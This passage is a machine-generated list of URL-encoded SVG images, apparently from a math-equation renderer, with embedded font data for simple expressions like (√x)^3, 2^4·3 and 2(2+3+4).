22%20y2%3D%224.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2272.5%22%20y%3D%2219%22%3Ey%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2223%22%20width%3D%2276%22%20wrs%3Abaseline%3D%2219%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E1%3C%2Fmn%3E%3Cmo%3E.%3C%2Fmo%3E%3Cmn%3E20%3C%2Fmn%3E%3Cmo%3E%26%23xB7%3B%3C%2Fmo%3E%3Cmsup%3E%3Cmn%3E10%3C%2Fmn%3E%3Cmrow%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmn%3E4%3C%2Fmn%3E%3C%2Fmrow%3E%3C%2Fmsup%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1bd801cec7580383152bae376ff'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAAERjdnQgDVUNBwAAAWAAAAA6Z2x5ZoPi2VsAAAGcAAAA62hlYWQQC2qxAAACiAAAADZoaGVhCGsXSAAAAsAAAAAkaG10eE2rRkcAAALkAAAAEGxvY2EAHTwYAAAC9AAAABRtYXhwBT0FPgAAAwgAAAAgbmFtZaBxlY4AAAMoAAABn3Bvc3QB9wD6AAAEyAAAACBwcmVwa1uragAABOgAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEADAAAAAIAAgAAgAAAC4AtyIS%2F%2F8AAAAuALciEv%2F%2F%2F9P%2FS93xAAEAAAAAAAAAAAAAAVQDLACAAQAAVgAqAlgCHgEOASwCLABaAYACgACgANQAgAAAAAAAAAArAFUAgACrANUBAAErAAcAAAACAFUAAAMAA6sAAwAHAAAzESERJSERIVUCq%2F2rAgD%2BAAOr%2FFVVAwAAAQAgAAAAoACAAAMALxgBsAQQsAPUsAMQsALUsAMQsAA8sAIQsAE8ALAEELAD1LADELACPLAAELABPDAxNzMVIyCAgICAAAEAgAFVAOsBwAADABsYAbAEELEAA%2FSxAgP0sQUD9ACwBBCxAwb0MDETMxUjgGtrAcBrAAEAgAFVAtUBqwADADAYAbAEELEAA%2FawAzyxAgf1sAE8sQUD5gCxAAATELEABuWxAAETELABPLEDBfWwAjwTIRUhgAJV%2FasBq1YAAAEAAAABAADVeM5BXw889QADBAD%2F%2F%2F%2F%2F1joTc%2F%2F%2F%2F%2F%2FWOhNzAAD%2FIASAA6sAAAAKAAIAAQAAAAAAAQAAA%2Bj%2FagAAF3AAAP%2B2BIAAAQAAAAAAAAAAAAAAAAAAAAQDUgBVAMgAIAFrAIADVgCAAAAAAAAAACgAAABuAAAAoQAAAOsAAQAAAAQAXgAFAAAAAAACAIAEAAAAAAAEAADeAAAAAAAAABUBAgAAAAAAAAABABIAAAAAAAAAAAACAA4AEgAAAAAAAAADADAAIAAAAAAAAAAEABIAUAAAAAAAAAAFABYAYgAAAAAAAAAGAAkAeAAAAAAAAAAIABwAgQABAAAAAAABABIAAAABAAAAAAACAA4AEgABAAAAAAADADAAIAABAAAAAAAEABIAUAABAAAAAAAFABYAYgABAAAAAAAGAAkAeAABAAAAAAAIABwAgQADAAEECQABABIAAAADAAEECQACAA4AEgADAAEECQADADAAIAADAAEECQAEABIAUAADAAEECQAFABYAYgADAAEECQAGAAkAeAADAAEECQAIABwAgQBNAGEAdABoACAARgBvAG4AdABSAGUAZwB1AGwAYQByAE0AYQB0AGgAcwAgAEYAbwByACAATQBvAHIAZQAgAE0AYQB0AGgAIABGAG8AbgB0AE0AYQB0AGgAIABGAG8AbgB0AFYAZQByAHMAaQBvAG4AIAAxAC4AME1hdGhfRm9udABNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAAAMAAAAAAAAB9AD6AAAAAAAAAAAAAAAAAAAAAAAAAAC5BxEAAI2FGACyAAAAFRQTsQABPw%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2219%22%3E1%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1bd801cec7580383152bae376ff%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2211.5%22%20y%3D%2219%22%3E.%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2219%22%3E20%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1bd801cec7580383152bae376ff%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2236.5%22%20y%3D%2219%22%3E%26%23xB7%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2249.5%22%20y%3D%2219%22%3E10%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1bd801cec7580383152bae376ff%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2263.5%22%20y%3D%2212%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2271.5%22%20y%3D%2212%22%3E4%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2225%22%20width%3D%2243%22%20wrs%3Abaseline%3D%2221%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmsup%3E%3Cmfenced%3E%3Cmsqrt%3E%3Cmi%3Ex%3C%2Fmi%3E%3C%2Fmsqrt%3E%3C%2Fmfenced%3E%3Cmn%3E3%3C%2Fmn%3E%3C%2Fmsup%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'round_brackets18549f92a457f2409'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMjwHLFQAAADMAAAATmNtYXDf7xCrAAABHAAAADxjdnQgBAkDLgAAAVgAAAASZ2x5ZmAOz2cAAAFsAAABJGhlYWQOKih8AAACkAAAADZoaGVhCvgVwgAAAsgAAAAkaG10eCA6AAIAAALsAAAADGxvY2EAAARLAAAC%2BAAAABBtYXhwBIgEWQAAAwgAAAAgbmFtZXHR30MAAAMoAAACOXBvc3QDogHPAAAFZAAAACBwcmVwupWEAAAABYQAAAAHAAAGcgGQAAUAAAgACAAAAAAACAAIAAAAAAAAAQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAo8AMGe%2F57AAAHPgGyAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACgAKf%2F%2FAAAAKAAp%2F%2F%2F%2F2f%2FZAAEAAAAAAAAAAAFUAFYBAAAsAKgDgAAyAAcAAAACAAAAKgDVA1UAAwAHAAA1MxEjEyMRM9XVq4CAKgMr%2FQAC1QABAAD%2B0AIgBtAACQBNGAGwChCwA9SwAxCwAtSwChCwBdSwBRCwANSwAxCwBzywAhCwCDwAsAoQsAPUsAMQsAfUsAoQsAXUsAoQsADUsAMQsAI8sAcQsAg8MTAREAEzABEQASMAAZCQ%2FnABkJD%2BcALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAA%2FtACIAbQAAkATRgBsAoQsAPUsAMQsALUsAoQsAXUsAUQsADUsAMQsAc8sAIQsAg8ALAKELAD1LADELAH1LAKELAF1LAKELAA1LADELACPLAHELAIPDEwARABIwAREAEzAAIg%2FnCQAZD%2BcJABkALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAAAAEAAPW2NYFfDzz1AAMIAP%2F%2F%2F%2F%2FVre7u%2F%2F%2F%2F%2F9Wt7u4AAP7QA7cG0AAAAAoAAgABAAAAAAABAAAHPv5OAAAXcAAA%2F%2F4DtwABAAAAAAAAAAAAAAAAAAAAAwDVAAACIAAAAiAAAAAAAAAAAAAkAAAAowAAASQAAQAAAAMACgACAAAAAAACAIAEAAAAAAAEAABNAAAAAAAAABUBAgAAAAAAAAABAD4AAAAAAAAAAAACAA4APgAAAAAAAAADAFwATAAAAAAAAAAEAD4AqAAAAAAAAAAFABYA5gAAAAAAAAAGAB8A%2FAAAAAAAAAAIABwBGwABAAAAAAABAD4AAAABAAAAAAACAA4APgABAAAAAAADAFwATAABAAAAAAAEAD4AqAABAAAAAAAFABYA5gABAAAAAAAGAB8A%2FAABAAAAAAAIABwBGwADAAEECQABAD4AAAADAAEECQACAA4APgADAAEECQADAFwATAADAAEECQAEAD4AqAADAAEECQAFABYA5gADAAEECQAGAB8A%2FAADAAEECQAIABwBGwBSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFIAZQBnAHUAbABhAHIATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlACAAUgBvAHUAbgBkACAAYgByAGEAYwBrAGUAdABzACAAdwBpAHQAaAAgAGEAcwBjAGUAbgB0ACAAMQA4ADUANABSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFYAZQByAHMAaQBvAG4AIAAyAC4AMFJvdW5kX2JyYWNrZXRzX3dpdGhfYXNjZW50XzE4NTQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAAAAAMAAAAAAAADnwHPAAAAAAAAAAAAAAAAAAAAAAAAAAC5B%2F8AAY2FAA%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%223.5%22%20y%3D%2221%22%3E(%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2232.5%22%20y%3D%2221%22%3E)%3C%2Ftext%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%2212%2C-16%2011%2C-16%205%2C0%202%2C-6%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(5.5%2C22.5)%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%225%2C0%202%2C-6%200%2C-5%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(5.5%2C22.5)%22%2F%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2217.5%22%20x2%3D%2229.5%22%20y1%3D%226.5%22%20y2%3D%226.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2221%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2238.5%22%20y%3D%2211%22%3E3%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2219%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E27%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%229.5%22%20y%3D%2215%22%3E27%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2222%22%20width%3D%2234%22%20wrs%3Abaseline%3D%2218%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmsup%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmn%3E4%3C%2Fmn%3E%3C%2Fmsup%3E%3Cmo%3E%26%23xB7%3B%3C%2Fmo%3E%3Cmn%3E3%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1cedebb6e872f539bef8c3f9198'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAW2hlYWQQC2qxAAAB6AAAADZoaGVhCGsXSAAAAiAAAAAkaG10eE2rRkcAAAJEAAAACGxvY2EAHTwYAAACTAAAAAxtYXhwBT0FPgAAAlgAAAAgbmFtZaBxlY4AAAJ4AAABn3Bvc3QB9wD6AAAEGAAAACBwcmVwa1uragAABDgAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAALf%2F%2FwAAALf%2F%2F%2F9KAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQDrAcAAAwAbGAGwBBCxAAP0sQID9LEFA%2FQAsAQQsQMG9DAxEzMVI4BrawHAawAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUBawCAAAAAAAAAACgAAABbAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2218%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2212.5%22%20y%3D%2211%22%3E4%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1cedebb6e872f539bef8c3f9198%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2220.5%22%20y%3D%2218%22%3E%26%23xB7%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2228.5%22%20y%3D%2218%22%3E3%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2245%22%20width%3D%2234%22%20wrs%3Abaseline%3D%2230%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmfrac%3E%3Cmsqrt%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmsqrt%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmfrac%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%222.5%22%20x2%3D%2230.5%22%20y1%3D%2224.5%22%20y2%3D%2224.5%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%2212%2C-16%2011%2C-16%205%2C0%202%2C-6%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(4.5%2C20.5)%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%225%2C0%202%2C-6%200%2C-5%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(4.5%2C20.5)%22%2F%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2216.5%22%20x2%3D%2228.5%22%20y1%3D%224.5%22%20y2%3D%224.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2222.5%22%20y%3D%2219%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2216.5%22%20y%3D%2241%22%3E2%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2221%22%20width%3D%2277%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmo%3E(%3C%2Fmo%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmo%3E%2B%3C%2Fmo%3E%3Cmn%3E3%3C%2Fmn%3E%3Cmo%3E%2B%3C%2Fmo%3E%3Cmn%3E4%3C%2Fmn%3E%3Cmo%3E)%3C%2Fmo%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math117e62166fc8586dfa4d1bc0e17'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAoWhlYWQQC2qxAAACMAAAADZoaGVhCGsXSAAAAmgAAAAkaG10eE2rRkcAAAKMAAAACGxvY2EAHTwYAAAClAAAAAxtYXhwBT0FPgAAAqAAAAAgbmFtZaBxlY4AAALAAAABn3Bvc3QB9wD6AAAEYAAAACBwcmVwa1uragAABIAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAACv%2F%2FwAAACv%2F%2F%2F%2FWAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIAAVQLVAqsACwBJARiyDAEBFBMQsQAD9rEBBPWwCjyxAwX1sAg8sQUE9bAGPLENA%2BYAsQAAExCxAQbksQEBExCwBTyxAwTlsQsF9bAHPLEJBOUxMBMhETMRIRUhESMRIYABAFUBAP8AVf8AAasBAP8AVv8AAQAAAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAChAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%40font-face%7Bfont-family%3A'round_brackets18549f92a457f2409'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMjwHLFQAAADMAAAATmNtYXDf7xCrAAABHAAAADxjdnQgBAkDLgAAAVgAAAASZ2x5ZmAOz2cAAAFsAAABJGhlYWQOKih8AAACkAAAADZoaGVhCvgVwgAAAsgAAAAkaG10eCA6AAIAAALsAAAADGxvY2EAAARLAAAC%2BAAAABBtYXhwBIgEWQAAAwgAAAAgbmFtZXHR30MAAAMoAAACOXBvc3QDogHPAAAFZAAAACBwcmVwupWEAAAABYQAAAAHAAAGcgGQAAUAAAgACAAAAAAACAAIAAAAAAAAAQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAo8AMGe%2F57AAAHPgGyAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACgAKf%2F%2FAAAAKAAp%2F%2F%2F%2F2f%2FZAAEAAAAAAAAAAAFUAFYBAAAsAKgDgAAyAAcAAAACAAAAKgDVA1UAAwAHAAA1MxEjEyMRM9XVq4CAKgMr%2FQAC1QABAAD%2B0AIgBtAACQBNGAGwChCwA9SwAxCwAtSwChCwBdSwBRCwANSwAxCwBzywAhCwCDwAsAoQsAPUsAMQsAfUsAoQsAXUsAoQsADUsAMQsAI8sAcQsAg8MTAREAEzABEQASMAAZCQ%2FnABkJD%2BcALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAA%2FtACIAbQAAkATRgBsAoQsAPUsAMQsALUsAoQsAXUsAUQsADUsAMQsAc8sAIQsAg8ALAKELAD1LADELAH1LAKELAF1LAKELAA1LADELACPLAHELAIPDEwARABIwAREAEzAAIg%2FnCQAZD%2BcJABkALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAAAAEAAPW2NYFfDzz1AAMIAP%2F%2F%2F%2F%2FVre7u%2F%2F%2F%2F%2F9Wt7u4AAP7QA7cG0AAAAAoAAgABAAAAAAABAAAHPv5OAAAXcAAA%2F%2F4DtwABAAAAAAAAAAAAAAAAAAAAAwDVAAACIAAAAiAAAAAAAAAAAAAkAAAAowAAASQAAQAAAAMACgACAAAAAAACAIAEAAAAAAAEAABNAAAAAAAAABUBAgAAAAAAAAABAD4AAAAAAAAAAAACAA4APgAAAAAAAAADAFwATAAAAAAAAAAEAD4AqAAAAAAAAAAFABYA5gAAAAAAAAAGAB8A%2FAAAAAAAAAAIABwBGwABAAAAAAABAD4AAAABAAAAAAACAA4APgABAAAAAAADAFwATAABAAAAAAAEAD4AqAABAAAAAAAFABYA5gABAAAAAAAGAB8A%2FAABAAAAAAAIABwBGwADAAEECQABAD4AAAADAAEECQACAA4APgADAAEECQADAFwATAADAAEECQAEAD4AqAADAAEECQAFABYA5gADAAEECQAGAB8A%2FAADAAEECQAIABwBGwBSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFIAZQBnAHUAbABhAHIATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlACAAUgBvAHUAbgBkACAAYgByAGEAYwBrAGUAdABzACAAdwBpAHQAaAAgAGEAcwBjAGUAbgB0ACAAMQA4ADUANABSAG8AdQBuAGQAIABiAHIAYQBjAGsAZQB0AHMAIAB3AGkAdABoACAAYQBzAGMAZQBuAHQAIAAxADgANQA0AFYAZQByAHMAaQBvAG4AIAAyAC4AMFJvdW5kX2JyYWNrZXRzX3dpdGhfYXNjZW50XzE4NTQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAAAAAMAAAAAAAADnwHPAAAAAAAAAAAAAAAAAAAAAAAAAAC5B%2F8AAY2FAA%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2212.5%22%20y%3D%2216%22%3E(%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2218.5%22%20y%3D%2216%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22math117e62166fc8586dfa4d1bc0e17%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2230.5%22%20y%3D%2216%22%3E%2B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2242.5%22%20y%3D%2216%22%3E3%3C%2Ftext%3E%3Ctext%20font-family%3D%22math117e62166fc8586dfa4d1bc0e17%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2254.5%22%20y%3D%2216%22%3E%2B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2266.5%22%20y%3D%2216%22%3E4%3C%2Ftext%3E%3Ctext%20font-family%3D%22round_brackets18549f92a457f2409%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%2